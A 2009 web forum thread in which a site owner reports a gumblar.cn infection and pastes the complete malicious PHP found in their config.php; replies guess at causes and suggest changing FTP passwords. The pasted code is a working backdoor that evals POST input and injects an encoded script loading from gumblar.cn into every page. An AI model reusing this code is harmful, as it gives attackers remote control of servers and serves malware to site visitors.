 |
 |
 |
 |
 |
| Author |
Message |
nolikewise
Joined: 17 Dec 2007
Posts: 149
Location: Turkiye |
|
 gumblar.cn virus php exloit code |
 |
Hi all CNR users and team,
I'd like to share one of my bad experiences. 5 minutes ago i noticed that my website is loading content from gumblar.cn and i got it was an exploit thing.
After editting and searching all of my files, i found that
/data/config.php had a long funciton which goes like that
 | |
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih5WEZWKXt2YXIgZXVUVz0oJ3ZfNjFyXzIwYV8zZF8yMl81M182M183MmlfNzB0RW5nXzY5bmVfMjJfMmNiXzNkXzIyVl82NXJfNzNfNjlfNmZuKF8yOStfMjJfMmNqXzNkXzIyXzIyXzJjdV8zZG5hdmlnYXRvXzcyXzJldXNlcl80MWdlbl83NF8zYmlmKCh1XzJlaV82ZWRleF80Zl82NihfMjJXaW5fMjIpXzNlMClfMjZfMjZfMjh1XzJlXzY5XzZlXzY0ZXhPXzY2XzI4XzIyTlRfMjA2XzIyKV8zYzApXzI2XzI2KGRvY3VtXzY1bnRfMmVjb29raWVfMmVpbmRleE9mKF8yMl82ZGlla18zZDFfMjIpXzNjMClfMjZfMjYodHlfNzBlXzZmZihfN2Fydnp0cylfMjFfM2R0Xzc5cGVvZihfMjJBXzIyXzI5KSlfN2JfN2FyXzc2enRfNzNfM2RfMjJBXzIyXzNiZXZhbChfMjJpZihfNzdpXzZlZG93XzJlXzIyXzJiYStfMjIpal8zZF82YStfMjIrXzYxXzJiXzIyTWFqXzZmcl8yMitiK2ErXzIyTV82OW5vcl8yMitfNjIrYStfMjJCdWlsXzY0XzIyK2IrXzIyal8zYl8yMilfM2JfNjRvY3VtZV82ZXRfMmV3cl82OXRfNjUoXzIyXzNjc2NyaV83MHRfMjBzXzcyY18zZF8yZl8yZmdfNzVtXzYybGFfNzJfMmVjbl8yZl83MnNfNzNfMmZfM2ZpZF8zZF8yMl8yYmorXzIyXzNlXzNjXzVjXzJmc2NyaXBfNzRfM2VfMjJfMjlfM2JfN2QnKS5yZXBsYWNlKHlYRlYsJyUnKTtldmFsKHVuZXNjYXBlKGV1VFcpKX0pKC9fL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
|
and it exploits and freezes browser.
How come anyone could add it in my config.php? Am i safe enough to hide my sql pass and others?
I am doubtful about filezilla coz i had the same thing before. Filezilla's bugs sometimes cause these exploits.
Any idea?
And FI-DD pls have a look that link and direct us to protect our files more...
Help my php site has been exploited or hacked. What can I do to make sure this does not happen again?
http://helpdesk.hostmonster.com/kb/index.php?x=&mod_id=2&id=271
|
|
| Mon May 11, 2009 2:23 pm |
    |
|
Guest
|
| |
|
Please login to hide the ads.
|
|
|
|
|
FI-DD
Admin
Joined: 22 Sep 2005
Posts: 2973
Location: Germany |
|
| |
|
All I can say is that the /data/ folder is protected by a .htaccess file. So I have no idea how this happened.
|
|
| Tue May 12, 2009 6:03 pm |
|
|
cablegunmaster
Joined: 05 May 2009
Posts: 34
|
|
|
| Thu May 14, 2009 8:39 am |
|
|
mark99
Joined: 09 Feb 2009
Posts: 127
|
|
| |
|
It's worth remembering that .htaccess is fallible, you can't reply on just that to secure the dir, there has to be a good setup of CHMODs as well as. It is possible to change the default CHMOD by fiddling with the ROOT head.php file - define('chmod', 0777); - but this makes a universal change and so can cause problems. Think I found a setting that worked but I can't recall what it was.
|
|
| Thu May 14, 2009 12:06 pm |
|
|
Torstein
Joined: 03 Aug 2006
Posts: 276
|
|
| |
|
It does however look like this is actually malware that you have on your computer that uses your FTP username and password to infect your files, so it isn't a PHP/CuteNews.RU exploit. From the link it looks like it puts code into all files on your FTP, including .htaccess, .php, .html, .js, etc.
|
|
| Thu May 14, 2009 12:12 pm |
|
|
nolikewise
Joined: 17 Dec 2007
Posts: 149
Location: Turkiye |
|
|
| Sat May 16, 2009 10:59 am |
|
|
azn_romeo_4u
Joined: 18 Sep 2008
Posts: 118
|
|
| |
|
It's not the script. It's your ftp. Someone gotten into your ftp and did it. Change your FTP password to something better with more characters and letters, numbers, and symbols if possible.
_________________
Cursors
Naruto Cursors
Myspace Cursors |
|
| Tue Jul 28, 2009 8:01 pm |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum
|
|
|
 |
 |
|
